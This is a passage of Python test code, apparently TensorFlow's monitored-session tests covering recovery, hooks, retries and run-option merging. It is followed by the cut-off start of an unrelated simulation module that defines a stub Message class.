    return self._sess.run(*args, **kwargs)
class RecoverableSessionTest(test.TestCase):
  """_RecoverableSession tests."""

  class _SessionReturner(object):
    # Minimal session creator: always hands back the same session.

    def __init__(self, sess):
      self._sess = sess

    def create_session(self):
      return self._sess

  def test_properties(self):
    # graph and sess_str are delegated to the underlying session.
    with self.test_session() as sess:
      constant_op.constant(0.0)
      recoverable_sess = monitored_session._RecoverableSession(
          self._SessionReturner(sess))
      self.assertEquals(sess.graph, recoverable_sess.graph)
      self.assertEquals(sess.sess_str, recoverable_sess.sess_str)

  def test_run(self):
    with self.test_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      recoverable_sess = monitored_session._RecoverableSession(
          self._SessionReturner(sess))
      self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))

  def test_recovery(self):
    with self.test_session() as sess:

      class StackSessionCreator(object):
        # Creator that pops pre-built aborting sessions off a stack, so
        # each recovery consumes exactly one session.

        def __init__(self, sess):
          self.sessions_to_use = [
              AbortAtNSession(sess, x + 1) for x in range(3)
          ]

        def create_session(self):
          return self.sessions_to_use.pop(0)

      c = constant_op.constant(0)
      v = array_ops.identity(c)
      session_creator = StackSessionCreator(sess)
      # List of 3 sessions to use for recovery.  The first one aborts
      # after 1 run() call, the second after 2 run calls, the third
      # after 3 run calls.
      self.assertEqual(3, len(session_creator.sessions_to_use))
      # Make the recoverable session uses these 3 sessions in sequence by
      # passing a factory that pops from the session_to_use list.
      recoverable_sess = monitored_session._RecoverableSession(session_creator)
      self.assertEqual(
          2, len(session_creator.sessions_to_use))  # One session popped.
      # Using first session.
      self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
      self.assertEqual(
          2, len(session_creator.sessions_to_use))  # Still 2 sessions available
      # This will fail and recover by picking up the second session.
      self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
      self.assertEqual(
          1, len(session_creator.sessions_to_use))  # Still 1 session available
      self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
      self.assertEqual(
          1, len(session_creator.sessions_to_use))  # Still 1 session available
      # This will fail and recover by picking up the last session.
      self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
      self.assertEqual(
          0, len(session_creator.sessions_to_use))  # All sessions used.
      self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
      self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
      # This will fail and throw a real error as the pop() will fail.
      with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
        recoverable_sess.run(v, feed_dict={c: -12})
class FakeSession(monitored_session._WrappedSession):
  """A _WrappedSession that records the kwargs passed to each run() call."""

  def __init__(self, sess):
    super(FakeSession, self).__init__(sess)
    self.args_called = {}

  def run(self, fetches, **kwargs):
    # Stash the extra arguments for later inspection, then forward only
    # the fetches to the underlying wrapped session.
    self.args_called = dict(kwargs)
    return super(FakeSession, self).run(fetches)
class HookedSessionTest(test.TestCase):
  """Tests of _HookedSession: argument forwarding, hook lifecycle, feeds."""

  def testRunPassesAllArguments(self):
    # run() must forward feed_dict/options/run_metadata to the wrapped session.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_run = FakeSession(sess)
      mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
      a_tensor = constant_op.constant([0], name='a_tensor')
      sess.run(variables.global_variables_initializer())
      output = mon_sess.run(fetches=a_tensor,
                            feed_dict='a_feed',
                            options='an_option',
                            run_metadata='a_metadata')
      self.assertEqual(output, [0])
      self.assertEqual(mock_run.args_called, {
          'feed_dict': 'a_feed',
          'options': 'an_option',
          'run_metadata': 'a_metadata'
      })

  def testCallsHooksBeginEnd(self):
    # before_run/after_run fire once per run(); begin/after_create_session
    # are not called by _HookedSession itself.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      sess.run(variables.global_variables_initializer())
      mon_sess.run(a_tensor)
      for hook in [mock_hook, mock_hook2]:
        self.assertEqual(
            hook.last_run_values,
            session_run_hook.SessionRunValues(
                results=None,
                options=config_pb2.RunOptions(),
                run_metadata=config_pb2.RunMetadata()))
        self.assertEqual(hook.last_run_context.original_args,
                         session_run_hook.SessionRunArgs(a_tensor))
        self.assertEqual(hook.last_run_context.session, sess)
        self.assertEqual(hook.call_counter['begin'], 0)
        self.assertEqual(hook.call_counter['after_create_session'], 0)
        self.assertEqual(hook.call_counter['before_run'], 1)
        self.assertEqual(hook.call_counter['after_run'], 1)

  def testShouldStop(self):
    # A single hook requesting a stop is enough to flip should_stop().
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      constant_op.constant([0], name='a_tensor')
      sess.run(variables.global_variables_initializer())
      mon_sess.run(fetches='a_tensor')
      self.assertFalse(mon_sess.should_stop())
      mock_hook.should_stop = True
      mon_sess.run(fetches='a_tensor')
      self.assertTrue(mon_sess.should_stop())

  def testFetchesHookRequests(self):
    # Extra fetches requested by hooks are run and delivered to each hook.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      another_tensor = constant_op.constant([5], name='another_tensor')
      third_tensor = constant_op.constant([10], name='third_tensor')
      mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
      mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
      sess.run(variables.global_variables_initializer())
      output = mon_sess.run(fetches=a_tensor)
      self.assertEqual(output, [0])
      self.assertEqual(mock_hook.last_run_values.results, [5])
      self.assertEqual(mock_hook2.last_run_values.results, [10])

  def testOnlyHooksHaveFeeds(self):
    # Feeds contributed by different hooks are merged into one feed_dict.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      add_tensor = a_tensor + b_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={b_tensor: [10]})
      sess.run(variables.global_variables_initializer())
      self.assertEqual(mon_sess.run(fetches=add_tensor), [15])

  def testBothHooksAndUserHaveFeeds(self):
    # Hook feeds merge with the caller's feed_dict without mutating it.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      c_tensor = constant_op.constant([0], name='c_tensor')
      add_tensor = a_tensor + b_tensor + c_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={b_tensor: [10]})
      sess.run(variables.global_variables_initializer())
      feed_dict = {c_tensor: [20]}
      self.assertEqual(
          mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
      # User feed_dict should not be changed
      self.assertEqual(len(feed_dict), 1)

  def testHooksFeedConflicts(self):
    # Two hooks feeding the same tensor is an error.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      add_tensor = a_tensor + b_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [10]})
      sess.run(variables.global_variables_initializer())
      with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
        mon_sess.run(fetches=add_tensor)

  def testHooksAndUserFeedConflicts(self):
    # A hook feeding a tensor the caller also feeds is an error.
    with ops.Graph().as_default(), session_lib.Session() as sess:
      mock_hook = FakeHook()
      mock_hook2 = FakeHook()
      mon_sess = monitored_session._HookedSession(
          sess=sess, hooks=[mock_hook, mock_hook2])
      a_tensor = constant_op.constant([0], name='a_tensor')
      b_tensor = constant_op.constant([0], name='b_tensor')
      add_tensor = a_tensor + b_tensor
      mock_hook.request = session_run_hook.SessionRunArgs(
          None, feed_dict={a_tensor: [5]})
      mock_hook2.request = session_run_hook.SessionRunArgs(
          None, feed_dict={b_tensor: [10]})
      sess.run(variables.global_variables_initializer())
      with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
        mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
  """Hook that raises a given exception the first time step N is reached."""

  def __init__(self, n, ex):
    self.n = n
    self.ex = ex
    self.raised = False

  def before_run(self, run_context):
    self.n -= 1
    if self.n != 0 or self.raised:
      return None
    # First arrival at step N: raise exactly once, then never again.
    self.raised = True
    raise self.ex
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
  """A hook that observes & optionally modifies RunOptions and RunMetadata."""

  def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
               debug_tensor_watch):
    self._trace_level = trace_level
    self._timeout_in_ms = timeout_in_ms
    self._output_partition_graphs = output_partition_graphs
    self._debug_tensor_watch = debug_tensor_watch
    # Observed values, appended once per run in after_run().
    self.run_options_list = []
    self.run_metadata_list = []

  def before_run(self, run_context):
    # Request the configured RunOptions for this run; the debug tensor
    # watch is attached through the options' debug_options.
    options = config_pb2.RunOptions(
        trace_level=self._trace_level,
        timeout_in_ms=self._timeout_in_ms,
        output_partition_graphs=self._output_partition_graphs)
    options.debug_options.debug_tensor_watch_opts.extend(
        [self._debug_tensor_watch])
    return session_run_hook.SessionRunArgs(None, None, options=options)

  def after_run(self, run_context, run_values):
    self.run_options_list.append(run_values.options)
    self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
  """MonitoredSession tests: stepping, recovery, retries, and exceptions."""

  def test_defaults(self):
    with ops.Graph().as_default():
      a_var = variables.Variable(0)
      with monitored_session.MonitoredSession() as session:
        self.assertEqual(0, session.run(a_var))

  def test_last_step(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      # Run till step 3 and save.
      hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
      scaffold = monitored_session.Scaffold().finalize()
      with monitored_session.MonitoredSession(hooks=hooks) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertFalse(session.should_stop())
        self.assertEqual(1, session.run(do_step))
        self.assertFalse(session.should_stop())
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
        self.assertEqual(3, session.run(do_step))
        self.assertTrue(session.should_stop())
        save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
                                        os.path.join(logdir, 'step-3'))
      # Run till step 5 and save.
      def load_ckpt(scaffold, sess):
        scaffold.saver.restore(sess, save_path)

      session_creator = monitored_session.ChiefSessionCreator(
          monitored_session.Scaffold(init_fn=load_ckpt))
      hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
      with monitored_session.MonitoredSession(
          hooks=hooks, session_creator=session_creator) as session:
        self.assertEqual(3, session.run(gstep))
        self.assertFalse(session.should_stop())
        self.assertEqual(4, session.run(do_step))
        self.assertFalse(session.should_stop())
        self.assertEqual(5, session.run(do_step))
        self.assertTrue(session.should_stop())

  def test_num_steps(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      # Do 3 steps and save.
      hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
      scaffold = monitored_session.Scaffold().finalize()
      with monitored_session.MonitoredSession(hooks=hooks) as session:
        session.run(do_step)
        self.assertFalse(session.should_stop())
        session.run(do_step)
        self.assertFalse(session.should_stop())
        session.run(do_step)
        self.assertTrue(session.should_stop())
        save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
                                        os.path.join(logdir, 'step-3'))
      # Restore and do 4 steps.
      def load_ckpt(scaffold, sess):
        scaffold.saver.restore(sess, save_path)

      session_creator = monitored_session.ChiefSessionCreator(
          scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
      hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
      with monitored_session.MonitoredSession(
          hooks=hooks, session_creator=session_creator) as session:
        self.assertEqual(4, session.run(do_step))
        self.assertFalse(session.should_stop())
        session.run(do_step)
        self.assertFalse(session.should_stop())
        session.run(do_step)
        self.assertFalse(session.should_stop())
        session.run(do_step)
        self.assertTrue(session.should_stop())

  # This set of tests, verifies the supervised session behavior when exceptions
  # are raised next to the innermost session run() call.

  def test_recovery(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      scaffold = monitored_session.Scaffold()
      # Use a hook to save the model every 100 steps.  It also saves it at
      # the end.
      hooks = [
          basic_session_run_hooks.CheckpointSaverHook(
              logdir, save_steps=1, scaffold=scaffold)
      ]
      with monitored_session.MonitoredSession(
          session_creator=monitored_session.ChiefSessionCreator(
              scaffold, checkpoint_dir=logdir),
          hooks=hooks) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredSession(
          session_creator=monitored_session.ChiefSessionCreator(
              scaffold, checkpoint_dir=logdir)) as session:
        self.assertEqual(2, session.run(gstep))
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredSession(
          session_creator=monitored_session.ChiefSessionCreator(
              scaffold,
              checkpoint_filename_with_path=saver_lib.latest_checkpoint(
                  logdir))) as session:
        self.assertEqual(2, session.run(gstep))

  def test_retry_initialization_on_aborted_error(self):
    # Tests that we silently retry on abort during initialization.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      self.init_raised_aborted_error = False

      def _init_fn(scaffold, session):
        _, _ = scaffold, session
        # Abort exactly once; the second initialization attempt succeeds.
        if not self.init_raised_aborted_error:
          self.init_raised_aborted_error = True
          raise errors_impl.AbortedError(None, None, 'Abort')

      with monitored_session.MonitoredSession(
          session_creator=monitored_session.ChiefSessionCreator(
              scaffold=monitored_session.Scaffold(
                  init_fn=_init_fn))) as session:
        self.assertFalse(session.should_stop())
        self.assertEqual(0, session.run(gstep))
      self.assertTrue(self.init_raised_aborted_error)

  def _retry_test(self, ex):
    # Tests that we silently retry on error.  Note that this does not test
    # recovery as we do not use a CheckpointSaver in this test.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      hook = RaiseOnceAtCountN(4, ex)
      with monitored_session.MonitoredSession(hooks=[hook]) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
        # Here at step 3, the hook triggers and raises AbortedError.  The
        # MonitoredSession automatically retries and restart from a freshly
        # initialized session, so the step is back to 0 and running do_step
        # moves it to 1.
        self.assertEqual(1, session.run(do_step))
        self.assertFalse(session.should_stop())
        self.assertTrue(hook.raised)
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())

  def test_retry_on_aborted_error(self):
    self._retry_test(errors_impl.AbortedError(None, None, 'Abort'))

  def test_retry_on_unavailable_error(self):
    self._retry_test(errors_impl.UnavailableError(None, None, 'Unavailable'))

  def test_recover_and_retry_on_aborted_error(self):
    # Tests that we silently retry and recover on abort.  This test uses
    # a CheckpointSaver to have something to recover from.
    logdir = _test_dir(self.get_temp_dir(),
                       'test_recover_and_retry_on_aborted_error')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      scaffold = monitored_session.Scaffold()
      abort_hook = RaiseOnceAtCountN(
          4, errors_impl.AbortedError(None, None, 'Abort'))
      # Save after each step.
      ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
          logdir, save_steps=1, scaffold=scaffold)
      hooks = [abort_hook, ckpt_hook]
      with monitored_session.MonitoredSession(
          session_creator=monitored_session.ChiefSessionCreator(
              scaffold, checkpoint_dir=logdir),
          hooks=hooks) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
        # Here at step 3, the hook triggers and raises AbortedError.  The
        # MonitoredSession automatically restores and retries.
        self.assertEqual(3, session.run(do_step))
        self.assertTrue(abort_hook.raised)
        self.assertFalse(session.should_stop())
        self.assertEqual(4, session.run(do_step))
        self.assertFalse(session.should_stop())

  def test_exit_cleanly_on_out_of_range_exception(self):
    # Tests that we stop cleanly when OutOfRange is raised.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
                                                              'EOI'))
      session = monitored_session.MonitoredSession(hooks=[hook])
      # session should cleanly exit from the context.
      with session:
        self.assertEqual(0, session.run(gstep))
        self.assertFalse(session.should_stop())
        # Here at step 1, the hook triggers and raises OutOfRange.  The
        # session should go into should_stop() mode.  It should raise the
        # exception.  So next step should not be executed.
        session.run(do_step)
        self.assertTrue(False)  # Unreachable: the run above must raise.
      self.assertTrue(session.should_stop())

  def test_exit_cleanly_on_stop_iteration_exception(self):
    # Tests that we stop cleanly when OutOfRange is raised.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      hook = RaiseOnceAtCountN(2, StopIteration)
      session = monitored_session.MonitoredSession(hooks=[hook])
      # session should cleanly exit from the context.
      with session:
        self.assertEqual(0, session.run(gstep))
        self.assertFalse(session.should_stop())
        # Here at step 1, the hook triggers and raises StopIteration.  The
        # session should go into should_stop() mode.  It should raise the
        # exception.  So next step should not be executed.
        session.run(do_step)
        self.assertTrue(False)  # Unreachable: the run above must raise.
      self.assertTrue(session.should_stop())

  def test_regular_exception_pass_through_run(self):
    # Tests that regular exceptions just pass through a "with
    # MonitoredSession" block and set the session in stop mode.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
      session = monitored_session.MonitoredSession(hooks=[hook])
      with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
        with session:
          self.assertEqual(0, session.run(gstep))
          self.assertEqual(1, session.run(do_step))
          self.assertEqual(2, session.run(do_step))
          self.assertFalse(session.should_stop())
          # This triggers the hook and raises the exception
          session.run(do_step)
          # We should not hit this
          self.assertFalse(True)
      self.assertTrue(hook.raised)
      self.assertTrue(session.should_stop())

  def test_regular_exception_reported_to_coord_pass_through_run(self):
    # Tests that regular exceptions reported to the coordinator from a thread
    # passes through a "run()" call within a "with MonitoredSession" block and
    # set the session in stop mode.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      session = monitored_session.MonitoredSession()
      run_performed_without_error = False
      with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
        with session:
          self.assertEqual(0, session.run(gstep))
          # Report an exception through the coordinator.
          try:
            raise RuntimeError('a thread wants to stop')
          except RuntimeError as e:
            session._coordinated_creator.coord.request_stop(e)
          # Call run() which should perform normally.
          self.assertEqual(0, session.run(gstep))
          run_performed_without_error = True
      self.assertTrue(run_performed_without_error)

  def test_regular_exception_reported_to_coord_pass_through_return(self):
    # Tests that regular exceptions reported to the coordinator from a thread
    # passes through returning from a "with MonitoredSession" block and
    # set the session in stop mode.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      session = monitored_session.MonitoredSession()
      with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
        with session:
          self.assertEqual(0, session.run(gstep))
          # Report an exception through the coordinator.
          try:
            raise RuntimeError('a thread wants to stop')
          except RuntimeError as e:
            session._coordinated_creator.coord.request_stop(e)
          self.assertTrue(session.should_stop())

  # This set of tests, verifies the session behavior when exceptions are raised
  # from code inside a "with MonitoredSession:" context.

  def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that regular exceptions pass through
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      session = monitored_session.MonitoredSession()
      with session:
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
      # Should have closed.
      self.assertTrue(session.should_stop())
      self.assertTrue(session._is_closed())

  def test_raises_regular_exceptions_in_with_body(self):
    # Tests that regular exceptions in "with body" are seen outside.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      session = monitored_session.MonitoredSession()
      # We should see that exception.
      with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
        with session:
          self.assertEqual(1, session.run(do_step))
          self.assertEqual(2, session.run(do_step))
          self.assertFalse(session.should_stop())
          # Will be visible outside the "with body".
          raise RuntimeError('regular exception')
      # Should have closed.
      self.assertTrue(session.should_stop())
      self.assertTrue(session._is_closed())

  def test_graph(self):
    with ops.Graph().as_default() as g:
      with monitored_session.MonitoredSession() as session:
        self.assertEqual(g, session.graph)

  def test_graph_finalized_during_run_unfinalized_after_exit(self):
    with ops.Graph().as_default() as g:
      a_var = variables.Variable(0)
      with monitored_session.MonitoredSession() as session:
        self.assertEqual(0, session.run(a_var))
        self.assertTrue(g.finalized)
      # Exiting the session must un-finalize the graph again.
      self.assertFalse(g.finalized)

  def test_keep_finalized_graph_as_finalized(self):
    with ops.Graph().as_default() as g:
      a_var = variables.Variable(0)
      monitored_session.Scaffold().finalize()
      with monitored_session.MonitoredSession() as session:
        self.assertEqual(0, session.run(a_var))
        self.assertTrue(g.finalized)
      # A graph finalized before the session stays finalized after it.
      self.assertTrue(g.finalized)

  def test_merge_run_options_from_hooks(self):
    """Test for rewriting RunOptions and observing RunMetadata with hooks."""
    with ops.Graph().as_default():
      my_const = constant_op.constant(42, name='my_const')
      _ = constant_op.constant(24, name='my_const_2')
      watch_a = debug_pb2.DebugTensorWatch(
          node_name='my_const',
          output_slot=0,
          debug_ops=['DebugIdentity'],
          debug_urls=[])
      hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a)
      watch_b = debug_pb2.DebugTensorWatch(
          node_name='my_const_2',
          output_slot=0,
          debug_ops=['DebugIdentity'],
          debug_urls=[])
      hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b)
      with monitored_session.MonitoredSession(
          hooks=[hook_a, hook_b]) as session:
        self.assertEqual(42, session.run(my_const))

        # trace_level=3 should have overridden trace_level=2;
        # timeout_in_ms=60000 should have overridden 30000;
        # output_partition_graphs=True should have overridden False.
        # The two debug tensor watches should have been merged.
        self.assertEqual(
            [
                config_pb2.RunOptions(
                    trace_level=3,
                    timeout_in_ms=60000,
                    output_partition_graphs=True,
                    debug_options=debug_pb2.DebugOptions(
                        debug_tensor_watch_opts=[watch_a, watch_b]))
            ],
            hook_b.run_options_list)
        self.assertEqual(1, len(hook_b.run_metadata_list))
        self.assertTrue(
            isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
        self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)

  def test_merge_caller_and_hook_run_options(self):
    """Test that RunOptions from caller and hooks can be merged properly."""
    with ops.Graph().as_default():
      my_const = constant_op.constant(42, name='my_const')
      _ = constant_op.constant(24, name='my_const_2')
      hook_watch = debug_pb2.DebugTensorWatch(
          node_name='my_const_2',
          output_slot=0,
          debug_ops=['DebugIdentity'],
          debug_urls=[])
      hook = RunOptionsMetadataHook(2, 60000, False, hook_watch)
      with monitored_session.MonitoredSession(hooks=[hook]) as session:
        caller_watch = debug_pb2.DebugTensorWatch(
            node_name='my_const',
            output_slot=0,
            debug_ops=['DebugIdentity'],
            debug_urls=[])
        caller_options = config_pb2.RunOptions(
            trace_level=3, timeout_in_ms=30000, output_partition_graphs=True)
        caller_options.debug_options.debug_tensor_watch_opts.extend(
            [caller_watch])
        self.assertEqual(42, session.run(my_const, options=caller_options))

        # trace_level=3 from the caller should override 2 from the hook.
        # timeout_in_ms=60000 from the hook should override from the caller.
        # output_partition_graph=True from the caller should override False
        # from the hook.
        # The two debug watches from the caller and the hook should be merged,
        # in that order.
        self.assertEqual(
            [
                config_pb2.RunOptions(
                    trace_level=3,
                    timeout_in_ms=60000,
                    output_partition_graphs=True,
                    debug_options=debug_pb2.DebugOptions(
                        debug_tensor_watch_opts=[caller_watch, hook_watch]))
            ],
            hook.run_options_list)
        self.assertEqual(1, len(hook.run_metadata_list))
        self.assertTrue(
            isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
        self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
class SingularMonitoredSessionTest(test.TestCase):
  """Tests SingularMonitoredSession: no retry/recovery, raw session access."""

  def test_handles_initialization(self):
    with ops.Graph().as_default():
      a_var = variables.Variable(0)
      with monitored_session.SingularMonitoredSession() as session:
        # If it's not initialized, following statement raises an error.
        self.assertEqual(0, session.run(a_var))

  def test_do_not_handle_aborted_error(self):
    # Unlike MonitoredSession, AbortedError must propagate to the caller.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()

      class _RaiseAbortedHook(session_run_hook.SessionRunHook):

        def before_run(self, run_context):
          raise errors_impl.AbortedError(None, None, 'Abort')

      with monitored_session.SingularMonitoredSession(
          hooks=[_RaiseAbortedHook()]) as session:
        with self.assertRaises(errors_impl.AbortedError):
          self.assertEqual(0, session.run(gstep))

      with self.assertRaises(errors_impl.AbortedError):
        with monitored_session.SingularMonitoredSession(
            hooks=[_RaiseAbortedHook()]) as session:
          self.assertEqual(0, session.run(gstep))

  def test_exit_cleanly_on_out_of_range_exception(self):
    # Tests that we stop cleanly when OutOfRange is raised.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
                                                              'EOI'))
      session = monitored_session.SingularMonitoredSession(hooks=[hook])
      # session should cleanly exit from the context.
      with session:
        self.assertEqual(0, session.run(gstep))
        self.assertFalse(session.should_stop())
        # Here at step 1, the hook triggers and raises OutOfRange.  The
        # session should go into should_stop() mode.  It should raise the
        # exception.  So next step should not be executed.
        session.run(do_step)
        self.assertTrue(False)  # Unreachable: the run above must raise.
      self.assertTrue(session.should_stop())

  def test_regular_exception_reported_to_coord_pass_through_run(self):
    # Tests that regular exceptions reported to the coordinator from a thread
    # passes through a "run()" call within a "with MonitoredSession" block and
    # set the session in stop mode.
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      session = monitored_session.SingularMonitoredSession()
      run_performed_without_error = False
      with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
        with session:
          self.assertEqual(0, session.run(gstep))
          # Report an exception through the coordinator.
          try:
            raise RuntimeError('a thread wants to stop')
          except RuntimeError as e:
            session._coordinated_creator.coord.request_stop(e)
          # Call run() which should perform normally.
          self.assertEqual(0, session.run(gstep))
          run_performed_without_error = True
      self.assertTrue(run_performed_without_error)

  def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that regular exceptions pass through
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      session = monitored_session.SingularMonitoredSession()
      with session:
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
      # Should have closed.
      self.assertTrue(session.should_stop())
      self.assertEqual(None, session.raw_session())

  def test_graph(self):
    with ops.Graph().as_default() as g:
      with monitored_session.SingularMonitoredSession() as session:
        self.assertEqual(g, session.graph)

  def test_raw_session(self):
    # raw_session() exposes the underlying tf Session while open.
    with ops.Graph().as_default():
      with monitored_session.SingularMonitoredSession() as session:
        self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
  # Run the full test suite when this file is executed directly.
  test.main()
|
__main__.py | import os
from enum import Enum, auto
from typing import List, Tuple, Callable, Dict
import multiprocessing
# Type aliases for the simulation engine.
Address = List[str]  # message address; presumably hierarchical path components -- TODO confirm
Time = int  # absolute simulation time
TimeInterval = int  # duration between two simulation times
class Message:
    """Base interface for messages exchanged between simulation actors.

    This stub implementation returns placeholder values; concrete message
    types are expected to override these accessors.
    """

    def __init__(self):
        pass

    @property
    def target(self) -> Address:
        """Destination address of the message (stub: None)."""
        return None

    def retarget(self, new_target: Address) -> None:
        """Replace the destination address with *new_target* (stub: no-op)."""
        pass

    @property
    def source(self) -> Address:
        """Address the message originated from (stub: None)."""
        return None

    @property
    def emission_time(self) -> Time:
